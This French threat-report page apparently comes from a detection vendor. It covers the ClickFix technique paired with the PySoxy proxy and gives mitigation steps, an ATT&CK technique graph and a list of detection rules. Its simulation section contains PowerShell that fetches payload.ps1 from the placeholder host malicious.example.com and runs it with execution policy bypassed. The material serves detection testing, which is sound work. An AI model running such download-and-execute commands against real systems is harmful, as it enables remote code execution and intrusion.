Suivre 
Résumé
ClickFix est une technique de livraison basée sur l’ingénierie sociale qui est maintenant associée au proxy SOCKS5 open-source PySoxy pour créer un canal d’accès secondaire chiffré. L’intrusion commence lorsqu’un utilisateur exécute une commande PowerShell malveillante, qui configure une persistance par tâche planifiée et lance une session de commande et de contrôle PowerShell en mémoire. Après la reconnaissance initiale, l’attaquant télécharge et exécute PySoxy pour établir un deuxième chemin chiffré dans l’environnement. Cette utilisation modulaire d’outils basés sur des interpréteurs rend à la fois la détection et la maîtrise de l’incident plus difficiles.
Enquête
ReliaQuest a observé une seule commande ClickFix déclenchée par un utilisateur qui a lancé un stager PowerShell obfusqué, créé une tâche planifiée, effectué une reconnaissance de domaine, et téléchargé plus tard un fichier bytecode Python compilé nommé b64.pyc, qui a été exécuté avec python.exe. Le composant PowerShell a agi en tant que RAT léger, interrogeant son serveur de commande et de contrôle toutes les trois secondes. Les chercheurs ont également vu l’attaquant utiliser curl pour télécharger des journaux et récupérer la charge utile PySoxy à partir du même serveur de mise en scène.
Atténuation
Les défenseurs devraient détecter et bloquer les lancements PowerShell suspects provenant de explorer.exe, surveiller les tâches planifiées qui exécutent des commandes PowerShell cachées, et rechercher des exécutions de Python utilisant des arguments liés au proxy tels que -ssl, -remote_ip, et -remote_port. Les équipes de sécurité devraient également inspecter le trafic sortant vers les domaines et adresses IP identifiés et supprimer tous les scripts PowerShell persistants ou fichiers .pyc trouvés dans ProgramData.
Réponse
Si des indicateurs connexes sont trouvés, isolez immédiatement l’hôte affecté, désactivez le compte utilisateur compromis, supprimez la tâche planifiée malveillante, effacez le script PowerShell et les artefacts PySoxy, et scannez le système pour rechercher d’autres résidus. Les défenseurs devraient également confirmer que le trafic sortant vers l’infrastructure identifiée est bloqué et vérifier qu’aucun autre mécanisme de persistance n’est actif.
"graph TB %% Class definitions classDef technique fill:#cce5ff %% Node definitions tech_content_injection["<b>Technique</b> – <b>T1659 Injection de contenu</b><br/><b>Description</b>: Les adversaires injectent du contenu malveillant dans des fichiers légitimes ou des flux de données pour permettre des actions malveillantes supplémentaires."] class tech_content_injection technique tech_user_exec_malicious_link["<b>Technique</b> – <b>T1204.001 Exécution par utilisateur : Lien malveillant</b><br/><b>Description</b>: La victime clique sur un lien conçu pour lancer du code malveillant."] class tech_user_exec_malicious_link technique tech_user_exec_psh_stager["<b>Technique</b> – <b>T1204 Exécution par utilisateur (stager PowerShell)</b><br/><b>Description</b>: Un utilisateur exécute une commande PowerShell qui prépare des charges utiles supplémentaires."] class tech_user_exec_psh_stager technique tech_obf_embedded_payloads["<b>Technique</b> – <b>T1027.009 Fichiers ou Informations Obfusqués : Charges utiles intégrées</b><br/><b>Description</b>: Les charges utiles sont cachées ou cryptées dans d’autres fichiers pour échapper à la détection."] class tech_obf_embedded_payloads technique tech_reflective_loading["<b>Technique</b> – <b>T1620 Chargement de code réflexif</b><br/><b>Description</b>: Le code malveillant est chargé directement en mémoire en utilisant des techniques réflexives."] class tech_reflective_loading technique tech_scheduled_task["<b>Technique</b> – <b>T1053 Tâche/Job Planifié</b><br/><b>Description</b>: Une tâche planifiée ou un job est créé pour exécuter du code malveillant pour la persistance."] class tech_scheduled_task technique tech_user_exec_psh_rat["<b>Technique</b> – <b>T1204 Exécution par utilisateur (RAT PowerShell en mémoire)</b><br/><b>Description</b>: L’utilisateur exécute involontairement un outil d’accès à distance basé sur PowerShell en mémoire."] class tech_user_exec_psh_rat technique tech_permission_groups["<b>Technique</b> – <b>T1069 Découverte des groupes de permissions</b><br/><b>Description</b>: L’adversaire énumère les groupes de permissions et les appartenances sur le système."] class tech_permission_groups technique tech_lateral_tool_transfer["<b>Technique</b> – <b>T1570 Transfert d’outil latéral</b><br/><b>Description</b>: Les outils ou fichiers sont transférés latéralement vers un autre hôte, par exemple, via un téléchargement curl."] class tech_lateral_tool_transfer technique tech_multistage_channels["<b>Technique</b> – <b>T1104 Canaux multiu2011étapes</b><br/><b>Description</b>: Un canal de communication supplémentaire est établi pour télécharger d’autres charges utiles telles que PySoxy."] class tech_multistage_channels technique tech_proxy["<b>Technique</b> – <b>T1090 Proxy</b><br/><b>Description</b>: Le trafic est acheminé par un serveur proxy pour cacher l’origine."] class tech_proxy technique tech_proxy_external["<b>Technique</b> – <b>T1090.002 Proxy : Proxy externe</b><br/><b>Description</b>: Un service proxy externe est utilisé pour masquer davantage le trafic de commandeu2011etunu2011contrôle."] class tech_proxy_external technique tech_exfil_alt_proto["<b>Technique</b> – <b>T1048 Exfiltration par protocole alternatif</b><br/><b>Description</b>: Les données sont exfiltrées en utilisant un protocole normalement non associé au transfert de données."] class tech_exfil_alt_proto technique %% Connections showing attack flow tech_content_injection –>|leads_to| tech_user_exec_malicious_link tech_user_exec_malicious_link –>|leads_to| tech_user_exec_psh_stager tech_user_exec_psh_stager –>|leads_to| tech_obf_embedded_payloads tech_obf_embedded_payloads –>|leads_to| tech_reflective_loading tech_user_exec_psh_stager –>|enables| tech_scheduled_task tech_scheduled_task –>|leads_to| tech_user_exec_psh_rat tech_user_exec_psh_rat –>|leads_to| tech_permission_groups tech_permission_groups –>|leads_to| tech_lateral_tool_transfer tech_lateral_tool_transfer –>|leads_to| tech_multistage_channels tech_multistage_channels –>|leads_to| tech_proxy tech_proxy –>|leads_to| tech_proxy_external tech_proxy_external –>|leads_to| tech_exfil_alt_proto "
Flux d’attaque
Détections
Énumération ou manipulation possible de compte ou de groupe (via cmdline)
Voir
Découverte suspecte de la confiance entre domaines (via cmdline)
Voir
Utilisation suspecte de CURL (via cmdline)
Voir
Chaînes PowerShell suspectes (via PowerShell)
Voir
Tâche planifiée suspecte (via audit)
Voir
IOC (SourceIP) à détecter : ClickFix évolue avec PySoxy Proxying
Voir
IOC (DestinationIP) à détecter : ClickFix évolue avec PySoxy Proxying
Voir
Détecter l’activité PySoxy et ClickFix avec des connexions sortantes suspectes [Connexion réseau Windows]
Voir
Détection de l’activité C2 PowerShell de ClickFix [Windows Powershell]
Voir
Campagne ClickFix – Explorer lançant PowerShell obfusqué [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : Le contrôle préalable de la télémétrie & de la base doit avoir réussi.
Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et visent à générer exactement la télémétrie attendue par la logique de détection.
-
Narratif d’attaque & Commandes :
- Objectif : Établir un canal C2 basé sur PowerShell (ClickFix) qui télécharge une charge malveillante depuis un serveur distant et l’exécute furtivement.
- Méthode : L’attaquant lance
powershell.exeavec les drapeaux exacts surveillés par la règle (-NoProfileand-ExecutionPolicy Bypass) et utiliseInvoke-WebRequestpour récupérer la charge utile. - Pourquoi cette méthode : En utilisant le PowerShell de Windows natif et le
Invoke-WebRequestcmdlet
commun, l'adversaire évite de télécharger des outils tiers, réduisant ainsi la probabilité de détection par les anti-virus tout en correspondant au comportement connu de ClickFix capturé dans la règle. -
# Étape 1 : Télécharger le script malveillant (simulé comme un fichier de test anodin) $url = « http://malicious.example.com/payload.ps1 » $out = « $env:TEMPpayload.ps1 » Invoke-WebRequest -Uri $url -OutFile $out # Étape 2 : Exécuter le script téléchargé en utilisant les mêmes paramètres de lancement surveillés par la règle powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out
# ============================================== # Simulation ClickFix PowerShell C2 (TC-20260514-3G7ZK) # ============================================== # Définir les variables $url = "http://malicious.example.com/payload.ps1" $out = "$env:TEMPpayload.ps1" # 1. Télécharger une charge utile factice (agit comme le fetch C2) Write-Host "[*] Téléchargement de la charge utile..." try { Invoke-WebRequest -Uri $url -OutFile $out -UseBasicParsing } catch { Write-Error "Échec du téléchargement : $_" exit 1 } # 2. Exécuter la charge utile avec les exacts drapeaux surveillés par la règle Write-Host "[*] Exécution de la charge utile avec -NoProfile -ExecutionPolicy Bypass" powershell.exe -NoProfile -ExecutionPolicy Bypass -File $out Write-Host "[+] Simulation complète." # ============================================== -
Commandes de nettoyage :
# Supprimer le fichier temporaire de charge utile if (Test-Path $out) { Remove-Item -Path $out -Force Write-Host "[*] Fichier de charge utile supprimé." } # Arrêter éventuellement les processus PowerShell persistants lancés par le test Get-Process -Name "powershell" | Where-Object {$_.Path -like "*powershell.exe"} | Stop-Process -Force Write-Host "[*] Nettoyage terminé."